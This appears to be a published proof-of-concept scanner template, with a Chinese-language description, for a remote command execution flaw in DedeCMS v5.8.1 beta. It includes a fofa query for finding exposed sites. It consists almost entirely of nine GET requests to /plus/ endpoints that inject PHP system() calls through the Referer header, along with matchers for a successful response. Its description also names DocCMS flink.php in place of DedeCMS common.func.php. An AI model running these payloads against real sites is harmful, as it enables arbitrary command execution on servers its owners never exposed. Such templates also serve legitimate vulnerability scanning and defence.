漏洞描述
DocCMS flink.php 文件存远程命令执行漏洞,攻击者通过漏洞可以执行任意命令。漏洞影响:DedeCMS v5.81 beta 内测版
fofa-query: "DedeCMS_V5.8.1"
dedecms-common-func-rce: DedeCMS common.func.php 远程命令执行漏洞
PoC代码[已公开]
id: dedecms-common-func-rce
info:
name: DedeCMS common.func.php 远程命令执行漏洞
author: daffainfo
severity: critical
description: |
DocCMS flink.php 文件存远程命令执行漏洞,攻击者通过漏洞可以执行任意命令。漏洞影响:DedeCMS v5.81 beta 内测版
fofa-query: "DedeCMS_V5.8.1"
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/DedeCMS%20common.func.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
rules:
r0:
request:
method: GET
path: /plus/flink.php?dopost=save
headers:
Accept: "*/*"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: <?php "system"(ls);?>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
r1:
request:
method: GET
path: /plus/users_products.php?oid=1337
headers:
Accept: "*/*"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: <?php "system"(ls);?>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
r2:
request:
method: GET
path: /plus/download.php?aid=1337
headers:
Accept: "*/*"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: <?php "system"(ls);?>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
r3:
request:
method: GET
path: /plus/showphoto.php?aid=1337
headers:
Accept: "*/*"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: <?php "system"(ls);?>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
r4:
request:
method: GET
path: /plus/users-do.php?fmdo=sendMail
headers:
Accept: "*/*"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: <?php "system"(ls);?>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
r5:
request:
method: GET
path: /plus/posttocar.php?id=1337
headers:
Accept: "*/*"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: <?php "system"(ls);?>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
r6:
request:
method: GET
path: /plus/vote.php?dopost=view
headers:
Accept: "*/*"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: <?php "system"(ls);?>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
r7:
request:
method: GET
path: /plus/carbuyaction.php?do=clickout
headers:
Accept: "*/*"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: <?php "system"(ls);?>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
r8:
request:
method: GET
path: /plus/recommend.php?c=dir
headers:
Accept: "*/*"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: <?php "system"($c);/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
expression: response.status == 200 && response.body.bcontains(b'DedeCMS 提示信息!') && response.body.bcontains(b'mytag_js.php') && response.body.bcontains(b'digg_ajax.php')
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8()